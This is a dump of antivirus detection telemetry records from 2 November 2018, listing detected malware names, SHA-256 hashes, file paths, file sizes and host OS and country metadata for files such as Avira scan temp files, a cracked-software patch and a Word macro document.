  Row(detection=Row(filename='avscan-20181102-052225-4128c95a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052225-4128C95A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chicken invaders 4.exe', filepath='E:\\NooN Games\\AutoPlay\\Temp\\Chicken Invaders 4\\Chicken Invaders 4.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='54ead74adf7ed441519196511e4d9d56a7cdeab303ecefe02193ed3c12917845', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DnXlZ3UOxEqDbxK6.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010915-5f7195f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-010850-5C018FC9\\AVSCAN-20181102-010915-5F7195F3', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061300-51ba0089', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061300-51BA0089', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4CCAA4375C978FA1F8BC6A651205398CA0801C04FCB88498E0E05EF149807010', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='57f290c101e83bdd47eda51d699318656afc9c78cd078d5c1a1cfba45f2fc368', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\57F290C101E83BDD47EDA51D699318656AFC9C78CD078D5C1A1CFBA45F2FC368', filesize=512000, name='TR/Injector.qqknw.#M1.#R1'), hash='57f290c101e83bdd47eda51d699318656afc9c78cd078d5c1a1cfba45f2fc368', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050810-433ecaff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050810-433ECAFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052829-1a087af1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052829-1A087AF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054224-0ba9243d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054224-0BA9243D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204055-5e072b36', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-204006-D57F2416\\AVSCAN-20181102-204055-5E072B36', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:41:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125118-d4eea2a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_37aca45d\\AVSCAN-20181102-125026-CAA2160F\\AVSCAN-20181102-125118-D4EEA2A7', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino_6_patch.exe', filepath='c:\\users\\X\\downloads\\archive-37ce\\rhino_6_patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T10:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161207-734c3571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-161207-734C3571', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143649-4cc56a24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143649-4CC56A24', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050708-1e8a9008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050708-1E8A9008', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060415-1920f85d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060415-1920F85D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060828-afb51fad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060828-AFB51FAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054953-16f20205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054953-16F20205', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060532-47260178', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060532-47260178', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-7754971b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-7754971B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052800-08aba300', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052800-08ABA300', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052926-3c23962d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052926-3C23962D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-cab3c58c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CAB3C58C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-17132d29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-17132D29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061603-bf27e150', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061603-BF27E150', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060021-8d3fcd97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060021-8D3FCD97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062646-3e0553e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062646-3E0553E1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060308-f0d18503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060308-F0D18503', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053836-83631a14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053836-83631A14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055159-628e6b01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055159-628E6B01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060240-e090e4d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060240-E090E4D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053502-0443010d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053502-0443010D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062542-1856c2ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062542-1856C2FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061108-0ee97436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061108-0EE97436', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061125-198b788a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061125-198B788A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060417-19f67e4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060417-19F67E4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062629-33d72366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062629-33D72366', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052831-1b47a525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052831-1B47A525', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053425-ee19c149', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053425-EE19C149', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062239-aadf68e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062239-AADF68E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050631-08867216', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050631-08867216', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052019-f5ae42c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052019-F5AE42C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062415-e41f9c57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062415-E41F9C57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055746-31302170', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055746-31302170', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055137-55142c8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055137-55142C8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050618-0081b7b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050618-0081B7B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055744-2fc8a280', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055744-2FC8A280', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050606-f97d7793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050606-F97D7793', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:00:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062338-ce5a52dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062338-CE5A52DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050942-7a4c3b46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050942-7A4C3B46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:03Z'), dt=datetime.date(2018, 11, 2)),
